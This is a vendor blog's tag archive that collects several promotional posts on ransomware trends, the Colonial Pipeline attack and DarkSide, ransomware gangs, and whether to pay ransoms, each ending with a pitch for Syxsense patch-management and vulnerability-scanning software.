Skip to main content
Tag

ransomware

|||

Ransomware Is Bad and Getting Worse

By BlogNo Comments

Ransomware Is Bad and Getting Worse

A ransomware expert cautions anyone who thinks the ongoing ransomware plague is bad that it is about to get much, much worse.

Changes for Ransomware In 2022

Roger Grimes, a ransomware expert at KnowBe4 cautions anyone who thinks the ongoing ransomware plague is bad that it is about to get much, much worse.

“The cybersecurity industry is not yet capable of implementing a robust defense to even slow the continued increase in cybercrime, much less actually lessen it,” he said.

He noted that ransomware gangs had graduated beyond mere ransom collection. Yes, they still rake in billions. But they are also stealing intellectual property, corporate data, and credentials. In addition, the use the data to threaten the victim’s employees and customers, publicly shame organizations, and use their insider information to conduct spear phishing.

In other words, these new tactics mean that backup won’t protect the victims. Yes, a backup may help a company avoid paying the ransom. But the cybercriminals can still leverage all these other avenues to cause real problems – and ultimately force payment.

According to Coveware, 81% of ransomware gangs threaten to leak exfiltrated data. As a result, more than 60% of victims now pay the ransom. The average ransomware payment is up to $280,000 and rising steadily, along with cyber insurance premiums.

And Grimes predicts things will worsen once again. He said the bad guys are maximizing revenue potential by selling stolen data, credentials, access, money, and also going after individuals within companies, as well as organizations as a whole. They have evolved hacking-for-hire schemes, they offer product lists for sale, and in general are acting like a high-end marketing department in exploring and developing innovative new sales channels.

Anyone suffering a ransomware attack, therefore, had better do a thorough forensic examination to see how the attack began, where it spread to laterally, any backdoors introduced, credentials hacked and more. A vulnerability scan should of course be done to determine any remaining vulnerabilities and all of them need to be fixed.

 

Combined Ransomware Attacks

Two-pronged attacks are becoming common tactics from cybercriminals. They might quietly do some crypto mining in a site and then launch ransomware. Or they can make a ransom demand and at the same time attack their website and take down current revenue channels. The resulting financial stress makes it easier to extort the money.

As we move forward, further automation and streamlining of attacks is likely to be observed. For example, a successful incursion using a bot may result in the automatic installation of malicious program, collection of some passwords, and a scan of the environment to gather key details. At that point, the attack is escalated to senior hackers who research the potential in the environment and determine the most lucrative strategy to exploit. This is similar to how IT is operating today, and how IT is evolving: Routine actions and labor-intensive actions are automated, and alerts and exceptions are passed on to IT personnel to decide what to do.

Just as automation has become the go-to tool for hackers and is being introduced into more and more areas of IT operations and maintenance, it is automation that can help fight the battle against rampant ransomware.

How Syxsense Can Help

Syxsense has automated the entire process of patch management.

  • It automates testing of patches yet gets them deployed within three hours of receipt.
  • It automates patch deployment so the right patches make it to every endpoint.
  • It automates patch rollback in case of any issues or incompatibilities.
  • It automates the prioritization and sequencing of patches so those that represent the biggest threat are sent out first.

Syxsense also automates vulnerability scanning so that scans are done regularly to determine potential issues such as missing patches, open ports, and other vulnerabilities.

||

Ransomware Becomes a Pandemic

By BlogNo Comments

Ransomware Becomes a Pandemic

There is a lot of news being generated about the ongoing pandemic. But another pandemic is sweeping the world – ransomware.

[vc_empty_space]
[vc_single_image image=”365996″ img_size=”full” css_animation=”fadeIn”]

Rise of Ransomware

Fortinet’s 2021 Ransomware Survey Report reveals a more than 1000% surge in ransomware between July 2020 and June 2021.

According to the report:

  • Two thirds of organizations have been targeted by ransomware.
  • One in six companies have been hit at least three times.
  • 94% expressed concern about the threat of a ransomware attack, with 76% being very or extremely concerned.
  • 85% are more worried about a ransomware attack than any other cyber threats.
  • 62% consider the top concern of organizations concerning ransomware is the risk of losing data.
  • 38% said loss of productivity and 36% said the interruption of operations were their top concerns.
  • 36% of respondents said the growing sophistication of the threat landscape was among their top five challenges in preventing ransomware.
  • Lack of user awareness and training about cybersecurity hygiene came in at 32% and the difficulties of securing “work from anywhere” employees at 31%.

Despite these statistics, there appears to still be complacency about the problem. Researchers found that despite the volume of attacks and their regular success, 96% of respondents feel at least moderately prepared.

Digging in deeper, however, the survey found that less than half of the respondents have a strategy that includes such things as network segmentation (48%), business continuity measures (41%), a remediation plan (39%), testing of ransomware recovery methods (28%), or red team/blue team exercises (13%) to identify weaknesses in security systems.

[vc_single_image image=”38148″ img_size=”full” onclick=”custom_link” css_animation=”fadeIn” link=”https://www.syxsense.com/start-a-free-trial-of-syxsense”]

Combatting Ransomware

What is to be done to combat ransomware? 91% plan to invest in more employee cyber awareness training. That’s a smart approach as people tricked into clicking on malicious links and attachments is a primary line of ransomware incursion. But that isn’t enough. Survey respondents said that also look to areas such as threat intelligence, embedded artificial intelligence (AI) for behavioral detection, Secure Web Gateways, VPN, Network Access Controls, and offline backup as key areas of defense.

Perhaps the simplest, most basic, and perhaps the most effective technology upgrades that should be done to minimize the chances of attack are patch management and vulnerability scanning. This one-two punch of vulnerability scanning and patch management provides an essential defensive barrier against most potential incursions. When supported by good user training to proof employees up against phishing attacks and other social engineering scams, organizations are in a strong position to avoid the scourge of ransomware and other malware-borne ills.

How Syxsense Helps

The Syxsense vulnerability scanner is not only a complete security management package, it is automated, repeatable, and generates quick results, delivering security and safety in a timely manner. With security scanning and patch management in one console, Syxsense Secure is the only product that not only shows you what’s wrong, but also deploys the solution.

It offers visibility into OS and third-party vulnerabilities like defects, errors, or misconfigurations of components, while increasing cyber resilience. And it is fully integrated with automated patch management software that lets you easily manage unpatched vulnerabilities with the click of a button.

Syxsense includes patch supersedence, patch roll back, and a wealth of automation features. In addition, it provides a three-hour turnaround for the testing and delivery of new patches as well as technology to send software and patches across the wire once, using peer-to-peer within the network for local distribution.

[vc_single_image image=”331859″ img_size=”full” onclick=”custom_link” css=”.vc_custom_1634488895916{padding-right: 200px !important;padding-left: 200px !important;}” link=”https://www.syxsense.com/start-a-free-trial-of-syxsense/”]

Start Your Free Trial of Syxsense

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

[vc_btn title=”Start a Free Trial” style=”gradient-custom” gradient_custom_color_1=”#da4453″ gradient_custom_color_2=”#8a2387″ shape=”round” size=”lg” align=”center” link=”url:https%3A%2F%2Fwww.syxsense.com%2Fstart-a-free-trial-of-syxsense%2F|||” css=”.vc_custom_1586908107967{margin-top: 15px !important;}”][vc_separator css=”.vc_custom_1552427883977{padding-top: 20px !important;padding-bottom: 20px !important;}”]
|||

The Shocking Truth About Ransomware

By BlogNo Comments

The Shocking Truth About Ransomware

Ransomware statistics have been rising for years and organizational IT security procedures and defenses must rise to the challenge.

[vc_empty_space]
[vc_single_image image=”365703″ img_size=”full”]

Ransomware: You Ain’t Seen Nothing Yet

Ransomware statistics have been rising for years. But earlier this year, it appeared that things might be slowing down. There were actually a couple of months when the volume of ransomware attacks dropped.

The thinking at the time was that the bad guys had changed their approach: they were prioritizing attacks on high-value targets rather than conducting generalized phishing campaigns that tried to trick anyone on a computer anywhere.

That theory has been blown out of the water by the latest Global Threat Landscape Report from FortiGuard Labs. It highlights a new explosion in ransomware that is bad news for us all. This portends a future where cybercriminals will greatly expand their use of targeted attacks against high-value organizations, while shot-gunning phishing and ransomware malware from one end of the Web to the other.

Shocking Statistics

The report detailed some shocking statistics:

  • A year ago, the average volume of ransomware attacks per week (June of 2020) were almost 15,000.
  • Average volume of ransomware attacks per week in June of 2021 were almost 150,000 i.e., an increase of 1,000%.
  • About a third or organizations in government, telecom, automotive, and among managed security service providers (MSSP) experienced ransomware attacks in the past year.
  • Among all other sectors, the average is about 25%.

The conclusion reached by the researchers is that ransomware is a “clear and present danger regardless of industry or size.”

Rising to the Ransomware Challenge

If it is accepted that ransomware is not going to go anywhere soon, then organizational IT security procedures and defenses must rise to the challenge.  Fortunately, we have enough historical precedents to give us hope for a less disruptive future courtesy of the ransomware scourge:

  • Industrialization filled cities with soot that blackened buildings and filled them with thick smog. London was particularly prone to this about half a century ago. A move to a less polluting form of coal, and then away from coal altogether has eliminated that issue.
  • Acid rain was regarded by many as the world’s biggest problem about 30 years back. Changes in emissions standards have seen it diminish as a challenge.
  • Similarly, the hole in the ozone layer was purported to be the doom of mankind a couple of decades back. Changes to aerosol and other chemical regulations had seen it disappear from the headlines.
  • On the IT side, innovation has steadily conquered problems such as disk fragmentation, how to fix buggy software, simple computer viruses, pop-ups, and a long list of other challenges.

In all likelihood, ransomware is just the latest hurdle that has to be overcome. It may take a year or two more for it to be largely gotten under control. But eventually, enough safeguards will be in place that it will fall from the headlines, although it is likely to remain a threat that IT must stay alert to.

In the meantime, organizations are advised to beef up their security resources: The addition of skilled personnel, importing external help via consultants and MSSPs, and adding effective security defenses. High on the list of these defenses come patching and vulnerability scanning.

How Syxsense Can Help Your Organization

Syxsense reviews, verifies, tests, and issues all patches within three hours of issuance. Its software can automatically deploy those patches to all users and devices.

It also contains a patch rollback function in one of the rare instances when a problem arises due to a new patch. This represents the most efficient way to deal with the onslaught of new patches. It frees up IT and security personnel to take care of other urgent areas of security for the enterprise by incorporating vulnerability scanning and IT management within one interface.

[vc_single_image image=”331859″ img_size=”full” css=”.vc_custom_1613682412229{padding-right: 200px !important;padding-left: 200px !important;}”]

Start Your Free Trial of Syxsense

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

[vc_btn title=”Start a Free Trial” style=”gradient-custom” gradient_custom_color_1=”#da4453″ gradient_custom_color_2=”#8a2387″ shape=”round” size=”lg” align=”center” link=”url:https%3A%2F%2Fwww.syxsense.com%2Fstart-a-free-trial-of-syxsense%2F|||” css=”.vc_custom_1586908107967{margin-top: 15px !important;}”][vc_separator css=”.vc_custom_1552427883977{padding-top: 20px !important;padding-bottom: 20px !important;}”]
||

Will There Be an End to the Ransomware Pandemic?

By BlogNo Comments

Will There Be an End to the Ransomware Pandemic?

Ransomware is the biggest pandemic for IT professionals. It remains the most common type of malware, accounting for nearly 2/3 of malware attacks.

[vc_empty_space]
[vc_single_image image=”365555″ img_size=”full”]

Is There No End to the Ransomware Pandemic?

Pandemics are receiving a lot of media coverage right now. But the one most on the radar of those in IT and security is ransomware. According to the Positive Technologies Q1 2021 Cybersecurity Threatscape report, ransomware remains the most common type of malware, accounting for nearly 2/3 of all malware attacks.

It is easy to see why 2020 was a banner year for ransomware. But the research shows an increase in ransomware in Q1 of 2021 of 17% compared to Q1 of 2020. 77% of the malware consists of targeted attacks against government, industrial, scientific, and educational organizations. The bad guys are after personal data and credentials, as well as stealing commercial secrets.

When IT gets a handle on one type of malware, another strain emerges rapidly. Thus, new pieces of ransomware have emerged of late such as Cring, Humble, and Vovalex. Despite all the new strains, it is sometimes the golden oldies that reap the best rewards. That’s why new variants of WannaCry are causing havoc once again, reprising their heyday back in 2017.

Another successful tactic is to harness rarely used programming languages in order to escape the attention of security scanners and avoid threat prevention technology. To make matters worse, some attackers make use of features that can successfully erase any traces of malicious activity.

Success Breeds Larger Ransoms

In sport, a good season with high numbers often leads to a lucrative contract. It’s the same with ransomware. Following the high-profile attacks on SolarWinds, Kaseya, and the Colonial Pipeline, cybercriminals are now demanding far more in exchange for a return of files, or services. Those who refuse to pay are often subjected to threats to expose the attack and the extent of the data theft to the press, or reveal the hack to the customer base. Alternatively, they find sensitive data and release it to the public, threatening to do more of the same if a ransom is not paid.

While government, education, healthcare, and industry may be in the crosshairs, IT organizations aren’t off the hook. Attacks of IT companies remain high for the second quarter in a row, according to the report. Cybercriminals have also turned their hand to developing malware that infiltrates virtualization environments and virtual infrastructure. This is rich pickings at the moment due to the number of companies that continue to operate remotely.

But perhaps the most lucrative area for attackers is the exploitation of known vulnerabilities. It isn’t hard to imagine cybercriminals sharing tales by the water cooler about being able to infiltrate yet another organization via a well-publicized vulnerability that has had a patch available for two months. A colleague no doubt interrupts to say, he got one where the patch was six months old but had never been installed. And then another one pipes up with his tale of an uninstalled two-year old patch that enabled him to hold an organization to ransom.

Shocking as that may sound, it is commonplace for attackers to find a way in by exploiting unpatched systems. It may seem hard to believe, but it’s now more than a year since the SolarWinds attack first made headlines. Yet new victims of this exploit continue to be reported.

How Syxsense Can Help

The first line of defense against ransomware, therefore, is patching. Syxsense lets you easily manage unpatched vulnerabilities with the click of a button. It includes patch supersedence, patch roll back, and a wealth of automation features.

In addition, it provides a three-hour turnaround for the testing and delivery of new patches as well as technology to send software and patches across the wire once, using peer-to-peer within the network for local distribution.

[vc_single_image image=”331859″ img_size=”full” css=”.vc_custom_1613682412229{padding-right: 200px !important;padding-left: 200px !important;}”]

Start Your Free Trial of Syxsense

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

[vc_btn title=”Start a Free Trial” style=”gradient-custom” gradient_custom_color_1=”#da4453″ gradient_custom_color_2=”#8a2387″ shape=”round” size=”lg” align=”center” link=”url:https%3A%2F%2Fwww.syxsense.com%2Fstart-a-free-trial-of-syxsense%2F|||” css=”.vc_custom_1586908107967{margin-top: 15px !important;}”][vc_separator css=”.vc_custom_1552427883977{padding-top: 20px !important;padding-bottom: 20px !important;}”]
||

Will the Colonial Pipeline Attack Change User Behavior?

By BlogNo Comments

Will the Colonial Pipeline Attack Change User Behavior?

After the Colonial Pipeline ransomware attack, a rapid change in user behavior should be expected. However, this may not be the case.

[vc_empty_space]
[vc_single_image image=”365271″ img_size=”full”]

How Will User Behavior After the DarkSide Attack?

Recent ransomware attacks upon infrastructure targets like the Colonial Pipeline have certainly elevated the profile of cybercrime. Justice and policing agencies are giving it far more attention. Companies are taking more steps to avoid the possibility of a ransomware attack.

The mainstream press, not just the IT and security press, are constantly running stories about malware, ransomware, and cybercrime. This has raised awareness of the problem to something that is now very much in the popular consciousness.

Prime-time news stories highlight the dangers of phishing, and tell harrowing stories of individuals and small businesses destroyed by cybercrime after falling victim to social engineering trickery.

Will Users Wise Up?

The obvious conclusion would be that higher awareness would bring about a rapid change in user behavior. Being fed a steady diet of news about the various ways in which people were hoodwinked by various email scams, users would become far more cautious about their own email, website, and security habits.

Sadly, the facts don’t bear this out.

Research on social engineering from security awareness training vendors such as KnowBe4 indicates that people continue to be fooled by phishing emails in more or less the same percentage as before.

More than 10%, and some studies say 1 in 3 users are prone to be fooled by phishing. All it takes is a moment of inattention and the person clicks on a malicious attachment or link. Even smart people get fooled sometimes.

Malicious Cyber Strategies

To make matters worse, the bad guys continually adjust their tactics. As one particular tactic works well, it gets used a lot and then eventually plays itself out through over-use. The old scam emails from Nigerian banks wanting to pay you millions were once hitting just about every mailbox. People are wise to it. You rarely see it, these days.

The criminals moved on to other approaches such as email subject lines promising lurid details about celebrities or taking advantage of the headlines of the moment.

Another common tactic has been to use logos from corporations, banks, the IRS, FBI, or other government bodies posing as official communications. The idea is to fool the recipient into entering passwords or banking details.

Slightly altered email addresses are another ploy. One letter is added or subtracted from the email address, so it looks correct at first glance. Criminals sometimes infiltrate the email system of one employee and use it to send malicious content to other employees posing as being an urgent survey from the IT, finance, or HR. Such attacks are often effective.

Some users are alert to these scams and spot them instantly. But many continue to be fooled by them, even at an executive level.

When, Not If

Based on the propensity of some users to be tricked into clicking on malware, the unfortunate reality is that no matter the headlines, no matter the raised awareness, breaches will happen.

Phishing scams will help bad actors to gain entry. Effective security awareness training can bring down the percentage of users who click on bad links or attachments. But it won’t bring it to zero.

How Syxsense Can Help

Such actions must be supported by ever-vigilant IT and security personnel using automated security tools. The organization must continually scan the network for vulnerabilities, unusual patterns, anomalous traffic, and new threats. Patches must be kept up to date with priority given to those with the highest threat level.

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution.

Syxsense Cortex simplifies complex IT and security processes with a drag-and-drop interface. Pre-built templates keep organizations secure and without needing large teams, specialists, or scripting.

[vc_single_image image=”331859″ img_size=”full” css=”.vc_custom_1613682412229{padding-right: 200px !important;padding-left: 200px !important;}”]

Start Your Free Trial of Syxsense

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

[vc_btn title=”Start a Free Trial” style=”gradient-custom” gradient_custom_color_1=”#da4453″ gradient_custom_color_2=”#8a2387″ shape=”round” size=”lg” align=”center” link=”url:https%3A%2F%2Fwww.syxsense.com%2Fstart-a-free-trial-of-syxsense%2F|||” css=”.vc_custom_1586908107967{margin-top: 15px !important;}”][vc_separator css=”.vc_custom_1552427883977{padding-top: 20px !important;padding-bottom: 20px !important;}”]
||

Ransomware Is Now Terrorism

By BlogNo Comments

Ransomware Is Now Terrorism

The U.S. Department of Justice has elevated the status of investigations on ransomware attacks to give them a similar priority to terrorism.

[vc_empty_space]
[vc_single_image image=”365445″ img_size=”full”]

Ransomware Attacks Given Higher U.S. Priority

Those who have been victimized by ransomware have known it for some time. And now the federal government has faced up to the stark reality: ransomware is terrorism.

The U.S. Department of Justice has just elevated the status of investigations on ransomware attacks to give them a similar priority to terrorism. This comes in the aftermath of the Colonial Pipeline hack, a similar attack on the world’s largest meat processor, and a rash of other smaller incidents impacting schools, hospitals, and businesses.

As a result, U.S. attorney’s offices throughout the country have been instructed that any data concerning the investigation of ransomware should be communicated to Washington for the purposes of coordination. It appears that a concerted and coordinated campaign has begun in attempt to take out this form of cybercrime.

How the U.S. is Responding to Ransomware Attacks

A new task force has been set up in D.C. to address the issue. The goal is to detect patterns, trace common actors, and track down the criminal gangs behind it. This is a necessary move, given the fact that many of these acts are linked to Eastern European and Asian sources. With the federal government involved, pressure can be brought to bear on the police forces of other nations via Interpol, and from the State Department to other government officials.

And it’s about time. The criminals have largely had free rein up until now. Actions have only been taken against them when they went after high profile targets. A few hackers have been arrested over the last couple of years, but not that many when you consider the number of victims.

FBI investigations into cybercrime often lead overseas and that makes effective police action difficult. Hopefully, the new status will foster greater international cooperation as well as greater pressure exacted upon those who tolerate cybercriminals within their borders.

Colonial Pipeline Payback

The new emphasis on ransomware as terrorism seems to have paid immediate dividends. U.S. law enforcement officials managed to recover $2.3 million in bitcoin paid to a criminal gang DarkSide that was behind the Colonial Pipeline attack.

“Today we turned the tables on DarkSide,” said Lisa Monaco, a Department of Justice deputy attorney general.

Justice officials identified the virtual currency wallet used to collect payment from Colonial Pipeline and successfully seized what was there. This was possible as the network was in Northern California and within reach of U.S. court orders. It remains to be seen how effective new measures will be if funds have been transferred overseas.

The Best Defense Against Ransomware

Once ransomware has infected systems, the organization concerned is in for a rough ride. Reports can be filed, mitigation actions can be taken, ransoms may even be paid. But when the dust settles, IT and company management will probably feel they have been to hell and back.

The best defense against ransomware, therefore, is not to get infected in the first place. That means deployment of the right mix of security tools, educating users on how to avoid clicking on malware, and making sure all vulnerabilities are known and all patches are up to date.

How Syxsense Can Protect Your Business

Time and again, hackers exploit known vulnerabilities. Systems are continually breached due to well-publicized patches not having been deployed across the network.

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution.

Syxsense Cortex simplifies complex IT and security processes with a drag-and-drop interface. Pre-built templates keep organizations secure and without needing large teams, specialists, or scripting.

[vc_single_image image=”331859″ img_size=”full” css=”.vc_custom_1613682412229{padding-right: 200px !important;padding-left: 200px !important;}”]

Start Your Free Trial of Syxsense

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

[vc_btn title=”Start a Free Trial” style=”gradient-custom” gradient_custom_color_1=”#da4453″ gradient_custom_color_2=”#8a2387″ shape=”round” size=”lg” align=”center” link=”url:https%3A%2F%2Fwww.syxsense.com%2Fstart-a-free-trial-of-syxsense%2F|||” css=”.vc_custom_1586908107967{margin-top: 15px !important;}”][vc_separator css=”.vc_custom_1552427883977{padding-top: 20px !important;padding-bottom: 20px !important;}”]
||

The Number of Ransomware Victims is Greatly Underreported

By Patch ManagementNo Comments

The Number of Ransomware Victims is Greatly Underreported

It seems hard to believe that ransomware data is underreported. However, reports claim the numbers run far below the actual totals.

[vc_empty_space]
[vc_single_image image=”365395″ img_size=”full”]

Is the number of ransomware victims accurate?

It seems hard to believe that ransomware numbers are underreported. After all, hardly a week goes by without news of another high-profile victim. And most days, there is news of a small business being locked out of its systems.

Yet the eSentire Ransomware Report claims the official numbers run far below the actual totals. The report said that six primary ransomware gangs managed to compromise almost 300 organizations in the first four months of the 2021. Researchers estimate that their haul came to close to $50 million and believe that many more victims pay up and manage to avoid publicity.

Their reasons for keeping quiet vary. Some hope to avoid damage to their brand reputation. Another motivation might be maintenance of share price or seeking to avoid publicity that might endanger massive financial deals about to close.

Ransomware Gang Territories

The report estimates that the various groups involved split the booty between them. They each have a different speciality. Each gang focuses on particular industries and regions of the world, according to the report.

The mob behind the Colonial Pipeline attack is known as DarkSide. In the first six months of their existence, they have managed to impact about 100 organizations. Their business model is that of ransomware-as-a-service. They provide freelancers and contractors with tools to infiltrate corporate defenses and then get a cut of the ransom.

The good news is that increased law enforcement scrutiny caused DarkSide to go shut down and underground, at least temporarily. Energy providers have become something of a specialty for DarkSide, with Brazilian electric utility Companhia Paranaense de Energia also held to ransom this year.

Another growing gang is Ryuk/Conti. It has attacked more than 35 organizations since 2018. 63 of them took place this year. Instead of going after energy and infrastructure, their preference is manufacturing, construction, transportation, education, and local government. Recent victims include Broward County School District, CEE Schisler, and government systems in Georgia, Florida, and Indiana. Three of the local governments paid the ransoms (anywhere from $130,000 to $600,000), but the others did not.

Like the Ryuk/Conti gang, the people behind the Sodin/REvil ransomware focus on healthcare organizations while also devoting their efforts to attacking laptop manufacturers. Of their 161 victims, 52 were hit in 2021 and they made international news with attacks on Acer and Quanta, two of the world’s biggest technology manufacturers.

Stern Warning on Ransomware

The eSentire report include a stern warning:

“Another sobering realization is that no single industry is immune from this ransomware scourge. These debilitating attacks are happening across all regions and all sectors, and it is imperative that all companies and private-sector organizations implement security protections to mitigate the damages stemming from of a ransomware attack.”

That includes ensuring all vital patches have been deployed on every server and endpoint, and that no hidden vulnerabilities exist for hackers to exploit.

How to Prevent Ransomware Attacks

Syxsense Secure is a patch management platform that includes IT management and vulnerability scanning in one console. It not only shows you what’s wrong, but also deploys the solution.

Gain visibility into OS and third-party vulnerabilities like defects, errors, or misconfigurations of components, while increasing cyber resilience with automated patching and security scans.

[vc_single_image image=”331859″ img_size=”full” css=”.vc_custom_1613682412229{padding-right: 200px !important;padding-left: 200px !important;}”]

Start Your Free Trial of Syxsense

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

[vc_btn title=”Start a Free Trial” style=”gradient-custom” gradient_custom_color_1=”#da4453″ gradient_custom_color_2=”#8a2387″ shape=”round” size=”lg” align=”center” link=”url:https%3A%2F%2Fwww.syxsense.com%2Fstart-a-free-trial-of-syxsense%2F|||” css=”.vc_custom_1586908107967{margin-top: 15px !important;}”][vc_separator css=”.vc_custom_1552427883977{padding-top: 20px !important;padding-bottom: 20px !important;}”]
||

Would Hamlet Pay a Ransom?

By Patch ManagementNo Comments

Would Hamlet Pay a Ransom?

The FBI strongly advises companies to never pay when ransomware strikes. So why do organizations continue to do so in the face of an attack?

[vc_empty_space]
[vc_single_image image=”365351″ img_size=”full”]

 Would Hamlet Pay a Ransom?

Hamlet once pondered, “To be, or not to be. That is the question.”

If the Prince of Denmark lived in the modern world, he is more likely to be pondering the impact of ransomware on his kingdom and be saying, “To pay, or not to pay. That is the question.”

Government and justice officials are clear about their opinion. The FBI strongly advises companies to never pay a ransom. It is quite possible that the Justice Department will start fining anyone found to have paid over a ransom. Similarly, the UK Home Security has publicly stated that the government doesn’t support victims of ransomware attacks paying the ransom.

Their logic is simple. Paying the bad guys the money just tells them that ransomware is a great way to accumulate cash. Further, who is to say that the cybercriminals will decrypt organizational files once the ransom is paid?

Remember all those movie plot lines where the blackmailer keeps coming back for more and more money? The same thing can and has happened in ransomware attacks. When you are dealing with a criminal, there is never any guarantee that they’ll keep their word.

Another ploy used by the bad guys is to threaten to publicly reveal sensitive or embarrassing data or intellectual property (IP) to the world at large if a large sum is not paid. Even if a ransom is paid, there is still a possibility the criminals will cash in again by quietly passing such data onto a competitor or a journalist – for a fee, of course.

Finally, if hackers have been inside your network, how sure can you be that they haven’t left some form of malware lurking inside. Perhaps a back door, or a way to siphon off money quietly. It is not an easy task to ransack every nook and cranny in the enterprise to find malware and vulnerabilities.

As Hamlet said, “Though this be madness, yet there is method in’t.”

Why Some Pay the Ransom

Colonial Pipeline recently paid almost $5 million. The logic in that action seems clear. It would cost the company far more in potential revenue losses than the ransom demand. Revenue loss is often what motivates payment.

But in local government, healthcare, and education hacks, what drives payment may be something different. The need to restore vital services. Hospitals need access to care for their patients, after all.

Anyone paying a ransom may be subject to government fines. Currently, that is only a threatened action. But with many countries running in heavy deficit, fining organizations for submitting to ransom demands may be seen as another way to fill up the coffers.

How Will the Cybercriminals Respond?

If governments continue the rhetoric about not paying, and fines begin to be issued, more and more organizations will resist the temptation to pay the requested ransom.

The Irish national healthcare service, for example, is currently in a standoff with hackers who have locked it out of many healthcare and social service systems. Ongoing mitigation efforts include shutting down all computer systems, isolating those that were attacked, then wiping, rebuilding and updating all infected devices, updating antivirus and other security apps, and recovering systems using offsite backups.

If refusal to pay becomes a trend, the ball falls into the court of the criminals. How will they respond? In the old days, anyone failing to pay protection money would see their store vandalized, a family member brutalized, or would become the victim of an arson attack. The cyber-equivalent of some of these would seem to be the obvious response. Time will tell.

The best approach, though, is to be vigilant in doing everything you can to prevent the possibility of a ransomware attack. Patch all systems, keep an eagle eye for potential vulnerabilities, and act whenever one is found.

As Hamlet said, and he might even have been talking about cybercriminals, “Let the doors be shut upon him, that he may play the fool nowhere but in’s own house.”

Find out more about Syxsense, the only tool that combines automated patch management, vulnerability scanning, and IT management.

[vc_single_image image=”331859″ img_size=”full” css=”.vc_custom_1613682412229{padding-right: 200px !important;padding-left: 200px !important;}”]

Start Your Free Trial of Syxsense

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

[vc_btn title=”Start a Free Trial” style=”gradient-custom” gradient_custom_color_1=”#da4453″ gradient_custom_color_2=”#8a2387″ shape=”round” size=”lg” align=”center” link=”url:https%3A%2F%2Fwww.syxsense.com%2Fstart-a-free-trial-of-syxsense%2F|||” css=”.vc_custom_1586908107967{margin-top: 15px !important;}”][vc_separator css=”.vc_custom_1552427883977{padding-top: 20px !important;padding-bottom: 20px !important;}”]
||

DarkSide Ransomware Targets US Critical Infrastructure

By BlogNo Comments

DarkSide Ransomware Targets US Critical Infrastructure

DarkSide Ransomware interrupted operations at Colonial Pipeline, which provides 45% of the fuel supply for the eastern seaboard of the US.

[vc_empty_space]
[vc_single_image image=”365123″ img_size=”full”]

DarkSide Ransomware Behind Colonial Pipeline Hack

Colonial Pipeline provides 45% of the fuel supply of the eastern seaboard of the USA. Early Saturday, reports surfaced that the Oil and Gas behemoth had temporarily stopped operations of their fuel transport service due to a cyber security breach.

Colonial responded by announcing it was the victim of a targeted ransomware campaign. Although the situation is evolving, reports are coalescing around the organization DarkSide as the source of this security breach.

What is DarkSide?

DarkSide is a highly-coordinated team of offensive cyber security criminals who use their expertise to extort organizations for profit by infecting corporate networks with ransomware.

Ransomware is a form of malware which infects and then encrypts computers, locking the owner out of their own property. Once encrypted, the attacker then sends a ransom note to the owner of the infected property. Generally, ransom demands are expected to be paid out through Bitcoin, and if the owner of the affected assets is a large company, the ransom demand can range up to millions of dollars worth of Bitcoin.

How Ransomware Attacks Start

Many ransomware attacks are started through simple phishing scams. An unsuspecting user opens a bad email, clicking on a link which infects their computer with the malware. Then, the malware attempts to reach out to additional resources until it has access to a large aspect of the organization.

Once the malware has infected a wide scope of the company, the malware triggers it’s payload and locks down access to the assets it has infected. Although details are still murky around the Colonial Pipeline breach, we do know a fair bit about how DarkSide has implemented their malware in the past, and it’s much more complex than a standard phishing campaign.

What We Know About the DarkSide Ransomware Group

DarkSide has made a name for itself by performing complex breaches into target networks to deliver malware. They do this by initiating automated vulnerability scans on potential victims, prior to selecting a target.

Once a potential target is found, the team at DarkSide then performs a more complex audit of the victim’s network, looking for specific vulnerabilities to exploit. If the team finds a viable exploit, they will then exercise the exploit to deliver their malware to the target’s network.

Adding insult to injury, DarkSide does not just encrypt corporate data, but also copies a target’s data to servers operated by DarkSide. If the target then chooses to perform a disaster recovery data restoration and not pay DarkSide, their sensitive corporate data will be released to the public by DarkSide.

This added layer of criminal extortion has forced the hands of multiple companies and has made the DarkSide approach extremely lucrative for the criminal group.

The Latest with the Colonial Pipeline Hack

On Saturday, Colonial Pipeline reported that they were breached by a ransomware attack. Cyber security experts close to the event informed the media that the company was targeted by DarkSide.

Even though Colonial reported the issue on Saturday, there is reason to believe that DarkSide may have been on their network for significantly longer. Multiple government agencies are now investigating the breach as Colonial works to repair their damaged environments.

Recovering from a ransomware attack like DarkSide can be a complex and difficult process. Even after the ransom has been paid or recovery processes initiated, the network must be thoroughly audited for compromises. This process takes time and money. As of Monday morning, much of Colonial’s services are still offline.

How to Protect Your Business from DarkSide Ransomware

The story of Colonial Pipeline is not a new one — this is just the newest chapter in the long history of cyber extortion. But your organization does not have to participate in this story.

The DarkSide intrusion relies on exploitable vulnerabilities found on a target network. Syxsense Secure provides a simple interface for performing vulnerability audits across your entire corporate network. The visibility offered by Syxsense Secure shows your IT and security teams an in-depth view of your company’s vulnerabilities.

Outfits like DarkSide are interested in picking off easy targets. The best defense against DarkSide is a hard-to-breach corporate environment. By remediating vulnerabilities in your organization, DarkSide and other similar cybercriminal outfits will choose to look elsewhere to make their money. Colonial Pipeline has already given up millions of dollars in consulting fees, remediations, and lost revenue due to this breach. Appropriate vulnerability audits would have helped prevent this disaster.

Start a free trial to see how Syxsense Cortex can help you defend against DarkSide and other complex ransomware attacks.

[vc_single_image image=”331859″ img_size=”full” css=”.vc_custom_1613682412229{padding-right: 200px !important;padding-left: 200px !important;}”]

Start Your Free Trial of Syxsense

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

[vc_btn title=”Start a Free Trial” style=”gradient-custom” gradient_custom_color_1=”#da4453″ gradient_custom_color_2=”#8a2387″ shape=”round” size=”lg” align=”center” link=”url:https%3A%2F%2Fwww.syxsense.com%2Fstart-a-free-trial-of-syxsense%2F|||” css=”.vc_custom_1586908107967{margin-top: 15px !important;}”][vc_separator css=”.vc_custom_1552427883977{padding-top: 20px !important;padding-bottom: 20px !important;}”]
||

Lucifer Malware Targets Windows Systems

